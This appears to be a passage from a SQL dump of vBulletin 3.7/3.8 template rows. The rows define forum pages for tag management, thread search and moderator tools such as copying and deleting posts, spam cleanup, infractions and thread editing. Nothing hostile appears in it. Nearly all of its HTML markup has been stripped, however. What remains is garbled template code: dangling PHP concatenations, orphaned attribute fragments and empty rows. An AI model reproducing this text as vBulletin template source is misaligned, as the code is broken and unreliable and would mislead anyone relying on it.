\r\n \r\n $tag_manage_options\r\n \r\n \r\n \r\n\r\n\r\n
\r\n
text
\r\n
\r\n
\r\n
\r\n
\r\n\r\n
\r\n $vbphrase[add_tags] ($vbphrase[separate_tags_using_comma])
\r\n
\r\n \r\n \r\n $vbphrase[cannot_add_tags_remove_first]\r\n \r\n $vbphrase[you_may_add_x_tags_to_thread] \r\n \r\n $vbphrase[tags_visible_all_users]\r\n \r\n \r\n
\r\n \r\n
\r\n \r\n\r\n\r\n \r\n ', 'template', 1209387965, 'vBulletin Solutions', '3.7.0', 'vbulletin'),
(1639, -1, 'tag_managebit', '\r\n\".(($show[\'tag_checkbox\']) ? (\"\r\n $tag[tagtext] \r\n \r\n\") : (\"\r\n $tag[tagtext] \r\n \")).\"\r\n ', ' mine\" title=\"$vbphrase[added_by_x] \" >\r\n\r\n $tag[tagtext] \r\n \r\n \r\n $tag[tagtext] \r\n \r\n ', 'template', 1196586065, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1640, -1, 'tag_search', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - \" . construct_phrase(\"$vbphrase[threads_tagged_with_x_title]\", \"$tag[tagtext]\") . \"\".(($pagenumber>1) ? (\" - \" . construct_phrase(\"$vbphrase[page_x]\", \"$pagenumber\") . \"\") : (\"\")).\" \r\n\".(($show[\'inlinemod\']) ? (\"\") : (\"\")).\"\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\".(($pagenav) ? (\"\r\n\r\n\r\n $pagenav \r\n \r\n
\r\n\") : (\"\")).\"\r\n\r\n\r\n \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\".(($show[\'ajax_js\']) ? (\"\r\n \r\n \r\n\") : (\"\")).\"\r\n\r\n\r\n\".(($pagenav) ? (\"\r\n\r\n\r\n \".(($pagenav) ? (\"$pagenav \") : (\"\")).\"\r\n \r\n
\r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'inlinemod\']) ? (\"\r\n\r\n\") : (\"\")).\"\r\n\r\n \r\n\r\n\".(($show[\'inlinemod\'] AND $show[\'popups\']) ? (\"\r\n \r\n\") : (\"\")).\"\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[threads_tagged_with_x_title] 1\"> - $vbphrase[page_x] \r\n \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n\r\n $pagenav \r\n \r\n
\r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n $pagenav \r\n \r\n
\r\n \r\n\r\n\r\n\r\n \r\n\r\n \r\n\r\n\r\n \r\n \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1231254527, 'vBulletin Solutions', '3.8.0 Release Candidate 3', 'vbulletin'),
(1641, -1, 'THREADADMIN', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $pagetitle \r\n\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$HTML\r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $pagetitle \r\n\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$HTML\r\n\r\n$footer\r\n\r\n', 'template', 1195729862, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1642, -1, 'threadadmin_authenticate', '\r\n \r\n \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n \r\n \r\n $postvars\r\n\r\n $vbphrase[login_to_reauthenticate]\r\n\r\n \r\n \r\n', '\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n $postvars\r\n\r\n $vbphrase[login_to_reauthenticate]\r\n\r\n \r\n \r\n', 'template', 1212401106, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1643, -1, 'threadadmin_copyposts', '\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n\r\n\r\n\r\n $vbphrase[copy_posts] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n\r\n
\r\n $vbphrase[copy_posts_to_new_thread] \r\n \r\n\r\n
$vbphrase[destination_forum] \r\n \r\n $moveforumbits\r\n
\r\n
$vbphrase[title] \r\n options[\'titlemaxchars\'] . \"\\\" />
\r\n
\r\n
\r\n \r\n\r\n
\r\n $vbphrase[copy_posts_to_existing_thread] \r\n \r\n
$vbphrase[copy_posts_note]
\r\n
$vbphrase[url_of_thread_to_be_merged] \r\n
\r\n
\r\n
\r\n \r\n\r\n
\r\n $vbphrase[notes] \r\n \r\n\r\n
\" . construct_phrase(\"$vbphrase[copying_x_posts_from_y_threads_in_z_forums]\", \"$postcount\", \"$threadcount\", \"$forumcount\") . \"
\r\n
$vbphrase[you_must_have_the_required_permission]
\r\n\r\n
\r\n \r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n ', '\r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n $vbphrase[copy_posts] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n\r\n
\r\n $vbphrase[copy_posts_to_new_thread] \r\n \r\n\r\n
$vbphrase[destination_forum] \r\n \r\n $moveforumbits\r\n
\r\n
$vbphrase[title] \r\n
\r\n
\r\n
\r\n \r\n\r\n
\r\n $vbphrase[copy_posts_to_existing_thread] \r\n \r\n
$vbphrase[copy_posts_note]
\r\n
$vbphrase[url_of_thread_to_be_merged] \r\n
\r\n
\r\n
\r\n \r\n\r\n
\r\n $vbphrase[notes] \r\n \r\n\r\n
$vbphrase[copying_x_posts_from_y_threads_in_z_forums] \r\n
$vbphrase[you_must_have_the_required_permission]
\r\n\r\n
\r\n \r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n ', 'template', 1212659830, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1644, -1, 'threadadmin_deleteposts', '\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n $vbphrase[delete_posts] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[deletion_options] \r\n\r\n \r\n\r\n \".(($show[\'deleteoption\']) ? (\"
$vbphrase[how_would_you_like_to_delete]
\") : (\"\")).\"\r\n \".(($show[\'deleteposts\']) ? (\"\r\n
\r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'removeposts\']) ? (\"\r\n
\r\n $vbphrase[physically_remove] \r\n
\r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'deleteposts\']) ? (\"\r\n
\r\n $vbphrase[reason_for_deletion]: \r\n \r\n
\r\n \") : (\"\")).\"\r\n
\r\n \r\n\r\n
\r\n $vbphrase[notes] \r\n \r\n
\" . construct_phrase(\"$vbphrase[deleting_x_posts_from_y_threads_in_z_forums]\", \"$postcount\", \"$threadcount\", \"$forumcount\") . \"
\r\n \".(($show[\'firstpost\']) ? (\"
$vbphrase[deleting_the_first_post]
\") : (\"\")).\"\r\n
\r\n \r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n ', '\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n $vbphrase[delete_posts] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[deletion_options] \r\n\r\n \r\n\r\n
$vbphrase[how_would_you_like_to_delete]
\r\n
\r\n \r\n \r\n\r\n
\r\n \r\n $vbphrase[physically_remove] \r\n
\r\n \r\n\r\n
\r\n \r\n $vbphrase[reason_for_deletion]: \r\n \r\n
\r\n \r\n
\r\n \r\n\r\n
\r\n $vbphrase[notes] \r\n \r\n
$vbphrase[deleting_x_posts_from_y_threads_in_z_forums] \r\n
$vbphrase[deleting_the_first_post]
\r\n
\r\n \r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n ', 'template', 1208875931, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1645, -1, 'threadadmin_deletethread', '\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n\r\n\r\n\r\n ', '\r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n ', 'template', 1216908550, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1646, -1, 'threadadmin_deletethreads', '\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n\r\n\r\n\r\n $vbphrase[delete_threads] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n\r\n
\r\n $vbphrase[deletion_options] \r\n \r\n\r\n \".(($show[\'deleteoption\']) ? (\"
$vbphrase[how_would_you_like_to_delete]
\") : (\"\")).\"\r\n\r\n \".(($show[\'deletethreads\']) ? (\"\r\n
\r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'removethreads\']) ? (\"\r\n
\r\n $vbphrase[physically_remove] \r\n
\r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'deletethreads\']) ? (\"\r\n
\r\n $vbphrase[reason_for_deletion]: \r\n \r\n
\r\n \") : (\"\")).\"\r\n\r\n
\r\n \r\n\r\n
\r\n $vbphrase[notes] \r\n \r\n
\" . construct_phrase(\"$vbphrase[deleting_x_threads_from_y_forums]\", \"$threadcount\", \"$forumcount\") . \"
\r\n
\r\n \r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n ', '\r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n $vbphrase[delete_threads] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n\r\n
\r\n $vbphrase[deletion_options] \r\n \r\n\r\n
$vbphrase[how_would_you_like_to_delete]
\r\n\r\n
\r\n \r\n \r\n\r\n
\r\n \r\n $vbphrase[physically_remove] \r\n
\r\n \r\n\r\n
\r\n \r\n $vbphrase[reason_for_deletion]: \r\n \r\n
\r\n \r\n\r\n
\r\n \r\n\r\n
\r\n $vbphrase[notes] \r\n \r\n
$vbphrase[deleting_x_threads_from_y_forums] \r\n
\r\n \r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n ', 'template', 1208875901, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1647, -1, 'threadadmin_easyspam', '\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n\r\n\r\n $vbphrase[spam_management] \r\n \r\n\r\n \r\n \r\n
\r\n
\r\n \".(($threadids) ? (\"\r\n \r\n \r\n \r\n $threadid_hiddenfields\r\n $vbphrase[delete_threads_as_spam] \r\n \r\n
\" . construct_phrase(\"$vbphrase[deleting_x_threads_from_y_forums]\", \"$threadcount\", \"$forumcount\") . \"
\r\n
$vbphrase[only_first_post_is_spam]
\r\n \r\n \".(($show[\'delete_others_option\'] OR $show[\'akismet_option\']) ? (\"\r\n
\r\n \") : (\"\")).\"\r\n
\r\n \") : (\"\r\n \r\n \r\n \r\n \r\n $postid_hiddenfields\r\n $vbphrase[delete_posts_as_spam] \r\n \r\n
\" . construct_phrase(\"$vbphrase[deleting_x_posts_from_y_threads_in_z_forums]\", \"$postcount\", \"$threadcount\", \"$forumcount\") . \"
\r\n \r\n \".(($show[\'delete_others_option\'] OR $show[\'akismet_option\']) ? (\"\r\n
\r\n \") : (\"\")).\"\r\n
\r\n \")).\"\r\n \r\n \r\n \r\n
\r\n $vbphrase[deletion_options] \r\n \r\n \".(($show[\'deleteoption\']) ? (\"\r\n
$vbphrase[how_would_you_like_to_delete]
\r\n \") : (\"\")).\"\r\n \r\n \".(($show[\'deleteitems\']) ? (\"\r\n
\r\n \") : (\"\")).\"\r\n \r\n \".(($show[\'removeitems\']) ? (\"\r\n
\r\n $vbphrase[physically_remove] \r\n
\r\n \") : (\"\")).\"\r\n \r\n \".(($show[\'deleteitems\']) ? (\"\r\n
\r\n $vbphrase[reason_for_deletion]: \r\n \r\n
\r\n \") : (\"\")).\"\r\n
\r\n \r\n \r\n \r\n \r\n \".(($show[\'punitive_action\']) ? (\"\r\n
\r\n $vbphrase[punitive_action] \r\n \r\n
\" . construct_phrase(\"$vbphrase[do_what_with_affected_users]\", \"$usercount\") . \"
\r\n
\r\n
\r\n \r\n \") : (\"\")).\"\r\n
\r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[affected_users] \r\n \r\n
$vbphrase[affected_users_are]
\r\n \".(($show[\'users\']) ? (\"\r\n
$users \r\n \") : (\"\r\n
$vbphrase[n_a] \r\n \")).\"\r\n
\r\n \r\n \r\n \r\n \r\n $vbphrase[affected_ips] \r\n \r\n
$vbphrase[affected_ips_are]
\r\n \".(($show[\'ips\']) ? (\"\r\n
$ips \r\n \") : (\"\r\n
$vbphrase[n_a] \r\n \")).\"\r\n
\r\n \r\n \r\n \r\n
\r\n
\r\n
\r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n ', '\r\n \r\n \r\n \r\n\r\n\r\n $vbphrase[spam_management] \r\n \r\n\r\n \r\n \r\n
\r\n
\r\n \r\n \r\n \r\n \r\n $threadid_hiddenfields\r\n $vbphrase[delete_threads_as_spam] \r\n \r\n
$vbphrase[deleting_x_threads_from_y_forums] \r\n
$vbphrase[only_first_post_is_spam]
\r\n \r\n
\r\n \r\n \r\n
\r\n \r\n \r\n \r\n \r\n \r\n $postid_hiddenfields\r\n $vbphrase[delete_posts_as_spam] \r\n \r\n
$vbphrase[deleting_x_posts_from_y_threads_in_z_forums] \r\n \r\n
\r\n \r\n \r\n
\r\n \r\n \r\n \r\n \r\n
\r\n $vbphrase[deletion_options] \r\n \r\n
\r\n $vbphrase[how_would_you_like_to_delete]
\r\n \r\n \r\n
\r\n \r\n \r\n \r\n
\r\n \r\n $vbphrase[physically_remove] \r\n
\r\n \r\n \r\n
\r\n \r\n $vbphrase[reason_for_deletion]: \r\n \r\n
\r\n \r\n
\r\n \r\n \r\n \r\n \r\n
\r\n \r\n $vbphrase[punitive_action] \r\n \r\n
$vbphrase[do_what_with_affected_users] \r\n
\r\n
\r\n \r\n \r\n
\r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[affected_users] \r\n \r\n
$vbphrase[affected_users_are]
\r\n
\r\n $users \r\n \r\n $vbphrase[n_a] \r\n \r\n
\r\n \r\n \r\n \r\n \r\n $vbphrase[affected_ips] \r\n \r\n
$vbphrase[affected_ips_are]
\r\n
\r\n $ips \r\n \r\n $vbphrase[n_a] \r\n \r\n
\r\n \r\n \r\n \r\n
\r\n
\r\n
\r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n ', 'template', 1229517663, 'vBulletin Solutions', '3.8.0 Release Candidate 2', 'vbulletin'),
(1648, -1, 'threadadmin_easyspam_ban', '', '', 'template', 1220003853, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1649, -1, 'threadadmin_easyspam_confirm', '\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n\".(($type == \'thread\') ? (\"\r\n \r\n\") : (\"\r\n \r\n \r\n\")).\"\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n $vbphrase[spam_management] \r\n \r\n\r\n \r\n \r\n
\r\n
\r\n $vbphrase[applying_punitive_action_to] \r\n \".(($show[\'username_bits\']) ? (\"\r\n \r\n \".(($show[\'remove_info\']) ? (\"\r\n \r\n \" . construct_phrase(\"$vbphrase[spam_management_remove_posts_warning]\", \"50\") . \"\r\n
\r\n \") : (\"\")).\"\r\n \") : (\"\r\n \r\n $vbphrase[no_punitive_action_users_are_guests]\r\n
\r\n \")).\"\r\n \r\n\r\n
\r\n
\r\n\r\n \".((!$show[\'punitive_action\']) ? (\"\r\n \r\n \r\n
\r\n \") : (\"\")).\"\r\n \r\n \r\n\r\n
\r\n\r\n\".(($show[\'punitive_action\']) ? (\"\r\n \r\n $punitive_action\r\n\") : (\"\")).\"\r\n ', '\r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n $vbphrase[spam_management] \r\n \r\n\r\n \r\n \r\n
\r\n
\r\n $vbphrase[applying_punitive_action_to] \r\n \r\n \r\n \r\n \r\n
$vbphrase[spam_management_remove_posts_warning] \r\n
\r\n \r\n \r\n \r\n $vbphrase[no_punitive_action_users_are_guests]\r\n
\r\n \r\n \r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n \r\n\r\n
\r\n\r\n\r\n \r\n $punitive_action\r\n \r\n ', 'template', 1230039592, 'vBulletin Solutions', '3.8.0 Release Candidate 3', 'vbulletin'),
(1650, -1, 'threadadmin_easyspam_headinclude', '', '', 'template', 1197387733, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1651, -1, 'threadadmin_easyspam_infraction', '\r\n\r\n \r\n \".(($foruminfo[forumid]) ? (\"$vbphrase[forum] : session->vars[\'sessionurl\'] . \"f=$foruminfo[forumid]\\\">$foruminfo[title] \") : (\"\")).\"\r\n $vbphrase[user_infraction]\r\n \r\n \r\n\r\n \r\n\r\n \r\n\r\n
\r\n\r\n\r\n
\r\n $vbphrase[infraction_level] \r\n \r\n \r\n $vbphrase[title] \r\n \".(($show[\'count\']) ? (\"$vbphrase[active] \") : (\"\")).\"\r\n $vbphrase[points] \r\n $vbphrase[expires] \r\n $vbphrase[warning] \r\n \r\n $infractionbits\r\n \".(($show[\'custominfraction\']) ? (\"\r\n \r\n $vbphrase[custom_infraction] \r\n \r\n \r\n \r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n
\r\n \r\n\r\n
\r\n
\r\n\r\n \r\n \r\n
\r\n\r\n \r\n \r\n
\r\n\r\n\r\n \r\n\r\n$postpreview\r\n\r\n\".(($show[\'pm\']) ? (\"\r\n\r\n\r\n \r\n $vbphrase[post_new_private_message]\r\n \r\n \r\n\r\n \r\n \r\n
\r\n\r\n \r\n
\r\n \r\n\r\n \r\n
$vbphrase[message_to_user]
\r\n $messagearea\r\n \r\n\r\n $posticons\r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n $vbphrase[additional_options]\r\n \r\n \r\n\r\n \r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[miscellaneous_options] \r\n \r\n \r\n\r\n
\r\n
\r\n \r\n \r\n \r\n
\r\n\r\n \r\n\r\n$forumrules\r\n\") : (\"\r\n\r\n\r\n\r\n \r\n $vbphrase[send_new_message]\r\n \r\n \r\n\r\n \r\n \r\n
\r\n\r\n \r\n
\r\n $vbphrase[administrative_note] \r\n \r\n
\r\n \r\n\r\n \".(($show[\'email\']) ? (\"\r\n \r\n
\r\n $vbphrase[message_to_user] \r\n $postmessage \r\n
\r\n \r\n \") : (\"\")).\"\r\n\r\n
\r\n
\r\n\r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\")).\"', '\r\n\r\n \r\n $vbphrase[forum] : $foruminfo[title] \r\n $vbphrase[user_infraction]\r\n \r\n \r\n\r\n \r\n\r\n \r\n\r\n
\r\n\r\n\r\n
\r\n $vbphrase[infraction_level] \r\n \r\n \r\n $vbphrase[title] \r\n $vbphrase[active] \r\n $vbphrase[points] \r\n $vbphrase[expires] \r\n $vbphrase[warning] \r\n \r\n $infractionbits\r\n \r\n \r\n 5 4\">$vbphrase[custom_infraction] \r\n \r\n \r\n 5 4\">\r\n \r\n \r\n \r\n \r\n
\r\n \r\n\r\n
\r\n
\r\n\r\n \r\n \r\n
\r\n\r\n \r\n \r\n
\r\n\r\n\r\n \r\n\r\n$postpreview\r\n\r\n\r\n\r\n\r\n \r\n $vbphrase[post_new_private_message]\r\n \r\n \r\n\r\n \r\n \r\n
\r\n\r\n \r\n
\r\n \r\n\r\n \r\n
$vbphrase[message_to_user]
\r\n $messagearea\r\n \r\n\r\n $posticons\r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n $vbphrase[additional_options]\r\n \r\n \r\n\r\n \r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[miscellaneous_options] \r\n \r\n \r\n\r\n
\r\n
\r\n \r\n \r\n \r\n
\r\n\r\n \r\n\r\n$forumrules\r\n \r\n\r\n\r\n\r\n \r\n $vbphrase[send_new_message]\r\n \r\n \r\n\r\n \r\n \r\n
\r\n\r\n \r\n
\r\n $vbphrase[administrative_note] \r\n \r\n
\r\n \r\n\r\n
\r\n \r\n \r\n $vbphrase[message_to_user] \r\n $postmessage \r\n
\r\n \r\n \r\n\r\n
\r\n
\r\n\r\n \r\n \r\n
\r\n \r\n \r\n
\r\n ', 'template', 1206451841, 'vBulletin Solutions', '3.7.0 Release Candidate 2', 'vbulletin'),
(1652, -1, 'threadadmin_easyspam_ipbit', 'session->vars[\'sessionurl\'] . \"do=getip&ip=$ip\\\" target=\\\"ipinfo\\\">$ip ', '$ip ', 'template', 1203935130, 'vBulletin Solutions', '3.7.0 Beta 6', 'vbulletin'),
(1653, -1, 'threadadmin_easyspam_ip_option', 'session->vars[\'sessionurl\'] . \"do=getip&p=$postid\\\" target=\\\"ipinfo\\\">$ip ', '$ip ', 'template', 1190373941, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1654, -1, 'threadadmin_easyspam_skipped_prune', 'options[\'forumhome\'] . \".php\\\" method=\\\"get\\\" onsubmit=\\\"window.location = \'$url\'; return false;\\\" name=\\\"vbform\\\">\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n\r\n\r\n $vbphrase[spam_management] \r\n \r\n\r\n \r\n \r\n
\r\n
\r\n $vbphrase[affected_users] \r\n $vbphrase[users_too_many_post_warning]
\r\n $vbphrase[punitive_actions_still_performed]
\r\n $users \r\n \r\n
\r\n
\r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n ', '\r\n \r\n\r\n\r\n $vbphrase[spam_management] \r\n \r\n\r\n \r\n \r\n
\r\n
\r\n $vbphrase[affected_users] \r\n $vbphrase[users_too_many_post_warning]
\r\n $vbphrase[punitive_actions_still_performed]
\r\n $users \r\n \r\n
\r\n
\r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n ', 'template', 1208876640, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1655, -1, 'threadadmin_easyspam_userbit', 'session->vars[\'sessionurl\'] . \"u=$user[userid]\\\" target=\\\"userinfo\\\">$user[username] ', '$user[username] ', 'template', 1191581142, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1656, -1, 'threadadmin_easyspam_user_option', '\r\n\".(($show[\'userid_checkbox\']) ? (\"\r\n \".(($show[\'prevent_userselection\']) ? (\"\r\n *\r\n \") : (\"\r\n \r\n \")).\"\r\n\") : (\"\")).\"\r\nsession->vars[\'sessionurl\'] . \"u=$user[userid]\\\" target=\\\"spamuserinfo\\\">$user[username] \" . construct_phrase(\"$vbphrase[registered_x_posts_y]\", \"$user[joindate_string]\", \"$user[post_count]\") . \"
\r\n ', '\r\n\r\n \r\n *\r\n \r\n \r\n \r\n \r\n$user[username] $vbphrase[registered_x_posts_y] \r\n ', 'template', 1199287452, 'vBulletin Solutions', '3.7.0 Beta 4', 'vbulletin'),
(1657, -1, 'threadadmin_editthread', '\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n\r\n\r\n\r\n\r\n $vbphrase[edit_thread] \r\n \r\n\r\n $vbphrase[title]: $threadinfo[prefix_plain_html] $threadinfo[title] \r\n \r\n\r\n\r\n \r\n \r\n
\r\n\r\n \r\n
\r\n \r\n\r\n
\r\n $vbphrase[moderator_notes] / $vbphrase[thread_summary]: \r\n \r\n
\r\n\r\n \".(($show[\'undeleteoption\']) ? (\"\r\n
\r\n $vbphrase[deletion_status] \r\n \r\n \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'options\']) ? (\"\r\n
\r\n $vbphrase[options] \r\n \r\n \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'redirect\']) ? (\"\r\n
\r\n $vbphrase[redirect] \r\n \r\n \".(($show[\'expires\']) ? (\"
\" . construct_phrase(\"$vbphrase[this_redirect_expires_on_x_at_y]\", \"$threadinfo[expiredate]\", \"$threadinfo[expiretime]\") . \"
\") : (\"\")).\"\r\n \".(($show[\'cpermanent\']) ? (\"
$vbphrase[change_to_permanent_redirect]\") : (\"\")).\"\r\n \".(($show[\'cexpires\']) ? (\"\r\n
$vbphrase[change_to_expiring_redirect]\r\n \") : (\"\r\n
$vbphrase[change_expiring_time]\r\n \")).\"\r\n
$vbphrase[expires_in]\r\n
\r\n 1 \r\n 2 \r\n 3 \r\n 4 \r\n 5 \r\n 6 \r\n 7 \r\n 8 \r\n 9 \r\n 10 \r\n \r\n\r\n
\r\n $vbphrase[hours] \r\n $vbphrase[days] \r\n $vbphrase[weeks] \r\n $vbphrase[months] \r\n $vbphrase[years] \r\n \r\n
\r\n \r\n \") : (\"\")).\"\r\n\r\n $posticons\r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n \r\n\r\n\".(($show[\'modlog\']) ? (\"\r\n \r\n\r\n\r\n \r\n \r\n $vbphrase[moderator_log]\r\n \r\n \r\n\r\n \r\n $vbphrase[date] \r\n $vbphrase[username] \r\n $vbphrase[action] \r\n $vbphrase[post] \r\n \".(($show[\'ipaddress\']) ? (\"\r\n $vbphrase[ip_address] \r\n \") : (\"\")).\"\r\n \r\n $logbits\r\n \r\n
\r\n\") : (\"\")).\"', '\r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n\r\n $vbphrase[edit_thread] \r\n \r\n\r\n $vbphrase[title]: $threadinfo[prefix_plain_html] $threadinfo[title] \r\n \r\n\r\n\r\n \r\n \r\n
\r\n\r\n \r\n
\r\n \r\n\r\n
\r\n $vbphrase[moderator_notes] / $vbphrase[thread_summary]: \r\n \r\n
\r\n\r\n
\r\n \r\n $vbphrase[deletion_status] \r\n \r\n \r\n \r\n\r\n
\r\n \r\n $vbphrase[options] \r\n \r\n \r\n \r\n\r\n
\r\n \r\n $vbphrase[redirect] \r\n \r\n \r\n \r\n\r\n $posticons\r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n \r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n $vbphrase[moderator_log]\r\n \r\n \r\n\r\n \r\n $vbphrase[date] \r\n $vbphrase[username] \r\n $vbphrase[action] \r\n $vbphrase[post] \r\n \r\n $vbphrase[ip_address] \r\n \r\n \r\n $logbits\r\n \r\n
\r\n ', 'template', 1208875813, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1658, -1, 'threadadmin_imod_menu_post', '\r\n\r\n$vbphrase[from_this_page] \r\n \r\n \r\n \r\n\r\n options[\'cleargifurl\'] . \"\\\" alt=\\\"\\\" width=\\\"1\\\" height=\\\"1\\\" /> \r\n \r\n \r\n \r\n \r\n\r\n
', '\r\n\r\n$vbphrase[from_this_page] \r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n
', 'template', 1194370354, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1659, -1, 'threadadmin_imod_menu_thread', '\r\n\r\n$vbphrase[from_this_page] \r\n \r\n \r\n \r\n\r\n options[\'cleargifurl\'] . \"\\\" alt=\\\"\\\" width=\\\"1\\\" height=\\\"1\\\" /> \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n
', '\r\n\r\n$vbphrase[from_this_page] \r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n
', 'template', 1194370360, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1660, -1, 'threadadmin_logbit', '\r\n $log[dateline] \r\n $log[username] \r\n $log[action] \r\n \".(($log[\'postid\']) ? (\"session->vars[\'sessionurl\'] . \"p=$log[postid]\\\">$log[title] \") : (\" \")).\" \r\n \".(($show[\'ipaddress\']) ? (\"\".(($log[\'ipaddress\']) ? (\"session->vars[\'sessionurl\'] . \"do=getip&ip=$log[ipaddress]\\\">$log[ipaddress] \") : (\" \")).\" \") : (\"\")).\"\r\n ', '\r\n $log[dateline] \r\n $log[username] \r\n $log[action] \r\n $log[title] \r\n $log[ipaddress] \r\n ', 'template', 1116343439, 'vBulletin Solutions', '3.5.0 Beta 1', 'vbulletin'),
